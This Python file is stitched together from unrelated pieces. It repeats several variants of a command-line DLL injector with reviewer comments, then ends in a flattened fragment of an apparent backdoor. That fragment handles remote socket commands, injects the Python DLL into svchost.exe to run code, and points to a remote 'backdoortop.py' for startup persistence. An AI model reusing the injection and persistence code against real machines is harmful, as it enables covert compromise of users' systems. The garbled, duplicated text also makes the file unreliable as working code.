def load_dll(pid, filename):
    """Inject a DLL into an already running process.

    Args:
        pid: Identifier of the target process; passed straight to ``Process``.
        filename: Library to load; passed unchanged to ``Process.inject_dll``.

    Returns:
        None. Whatever ``inject_dll`` returns is discarded.
    """
    # Wrap the target PID in a Process object.
    target = Process(pid)

    # Ask the target to load the library.
    # NOTE(review): no bitness check happens here, so the caller has to make
    # sure the DLL and this interpreter match the target's architecture.
    # NOTE(review): the name is presumably resolved by the loader inside the
    # target process - confirm, and prefer an absolute path to a known file.
    target.inject_dll(filename)
def load_dll(pid, filename):
    """Load the library ``filename`` inside the process identified by ``pid``.

    Builds a ``Process`` for the PID and calls its ``inject_dll`` method with
    the given filename. Nothing is returned to the caller.

    NOTE(review): once loaded, the library's code runs inside the target
    process. This helper does not check the filename or the target's bitness.
    """
    # Build the Process object and load the DLL into it in one step.
    Process(pid).inject_dll(filename)
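def main():
    """Command-line entry point: inject a DLL into one running process.

    Expects exactly two arguments in ``sys.argv``: the target, given either as
    a PID that ``HexInput.integer`` accepts or as a process filename, and the
    DLL to inject. The function prints a message and returns without
    injecting when the argument count is wrong, when no process or more than
    one process matches the filename, or when the target's bitness differs
    from ``System.bits``.
    """
    # Single-argument print(...) calls behave the same as the print statement
    # under Python 2 and also parse under Python 3.
    print("Process DLL injector")
    print("by Mario Vilas (mvilas at gmail.com)")
    print("")

    if len(sys.argv) != 3:
        script = os.path.basename(sys.argv[0])
        print("Injects a DLL into a running process.")
        print(" %s <pid> <library.dll>" % script)
        print(" %s <process.exe> <library.dll>" % script)
        return

    # The result of this call is not checked here.
    # NOTE(review): if the privilege is not granted, the failure presumably
    # shows up later, when the target is opened - confirm.
    System.request_debug_privileges()

    target = sys.argv[1]
    try:
        pid = HexInput.integer(target)
    except Exception:
        # Not parseable as a number: treat the argument as an image name.
        system = System()
        system.scan_processes()
        matches = system.find_processes_by_filename(target)
        if not matches:
            print("Process not found: %s" % target)
            return
        if len(matches) > 1:
            # Refuse to guess between same-named processes; list them so the
            # operator can rerun with an explicit PID.
            print("Multiple processes found for %s" % target)
            for proc, name in matches:
                # Each entry is a (process, name) pair, so %d needs the PID,
                # not the process object itself.
                print("\t%12d: %s" % (proc.get_pid(), name))
            return
        pid = matches[0][0].get_pid()
    print("Using PID %d (0x%x)" % (pid, pid))

    # NOTE(review): the DLL name is passed through exactly as typed.
    # Presumably the loader inside the target resolves it, so a relative name
    # may not refer to the file it would in this shell - confirm, and prefer
    # an absolute path.
    dll = sys.argv[2]
    print("Using DLL %s" % dll)

    process = Process(pid)
    bits = process.get_bits()
    if bits != System.bits:
        print("Cannot inject into a %d bit process from a %d bit Python VM!"
              % (bits, System.bits))
        return
    process.scan_modules()
    process.inject_dll(dll)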
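def main():
    """Run the DLL injector from the command line.

    ``sys.argv[1]`` selects the target process: it is first parsed with
    ``HexInput.integer`` as a PID and, if that raises, looked up as a process
    filename. ``sys.argv[2]`` is the DLL handed to ``Process.inject_dll``.

    The function returns early, after printing a message, in four cases: the
    argument count is wrong, no process matches the filename, several
    processes match it, or the target's bitness differs from ``System.bits``.
    """
    print("Process DLL injector")
    print("by Mario Vilas (mvilas at gmail.com)")
    # A bare `print` is a no-op expression under Python 3; call it so the
    # blank line is actually written.
    print()

    if len(sys.argv) != 3:
        script_name = os.path.basename(sys.argv[0])
        print("Injects a DLL into a running process.")
        print(" %s <pid> <library.dll>" % script_name)
        print(" %s <process.exe> <library.dll>" % script_name)
        return

    # The return value is ignored.
    # NOTE(review): a refused privilege request would presumably only show up
    # when the target is opened further down - confirm.
    System.request_debug_privileges()

    selector = sys.argv[1]
    try:
        pid = HexInput.integer(selector)
    except Exception:
        # Not a number, so fall back to a lookup by image name.
        snapshot = System()
        snapshot.scan_processes()
        candidates = snapshot.find_processes_by_filename(selector)
        if not candidates:
            print("Process not found: %s" % selector)
            return
        if len(candidates) > 1:
            # An ambiguous name is rejected rather than taking the first
            # match; the operator picks a PID from the listing.
            print("Multiple processes found for %s" % selector)
            for candidate, image in candidates:
                # Entries are (process, name) pairs, so format the PID with
                # %d rather than the process object.
                print("\t%12d: %s" % (candidate.get_pid(), image))
            return
        pid = candidates[0][0].get_pid()
    print("Using PID %d (0x%x)" % (pid, pid))

    # NOTE(review): the library name is forwarded unchanged. It is presumably
    # resolved inside the target process, so an absolute path is the
    # unambiguous choice - confirm.
    dll = sys.argv[2]
    print("Using DLL %s" % dll)

    target = Process(pid)
    target_bits = target.get_bits()
    if target_bits != System.bits:
        # The original line here, `print(() "..." % ...)`, was a syntax error.
        print(
            "Cannot inject into a %d bit process from a %d bit Python VM!"
            % (target_bits, System.bits)
        )
        return
    target.scan_modules()
    target.inject_dll(dll)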
def load_dll(pid, filename):
    """Make the process with the given PID load ``filename`` as a DLL.

    :param pid: target process identifier, used to construct ``Process``.
    :param filename: library name or path, forwarded as-is to ``inject_dll``.
    :return: ``None``; the result of ``inject_dll`` is not propagated.
    """
    proc = Process(pid)
    # NOTE(review): no validation of `filename` and no architecture check is
    # done at this level; both are left to the caller.
    proc.inject_dll(filename)
if dados.startswith("pwd"): s.send("\n"+str(os.getcwd)+"\n") if os.name == 'nt': try: # Injetando codigo python_lib = "python{0}{1}.dll".format(sys.version_info.major, sys.version_info.minor) python_dll = ctypes.util.find_library(python_lib) s = System() s.scan_processes() pl = s.find_processes_by_filename("svchost.exe") pid = pl[0][0].get_pid() p = Process(pid) print('pid', pid) print('arch', p.get_bits()) t = p.inject_dll(python_dll) p.scan_modules() m = p.get_module_by_name(python_lib) init = m.resolve("Py_InitializeEx") pyrun = m.resolve("PyRun_SimpleString") print(init, pyrun) p.start_thread(init, 0) time.sleep(0.1) sh = 'import subprocess; subprocess.call("svchost.exe")' addr = p.malloc(len(sh)) p.write(addr, sh) p.start_thread(pyrun, addr) # Movendo o backdoor pro startup if dados.startswith("move_startup"): url = "https://raw.githubusercontent.com/DedSec-F0x/DedSec-Framework/master/exploit/python/backdoortop.py"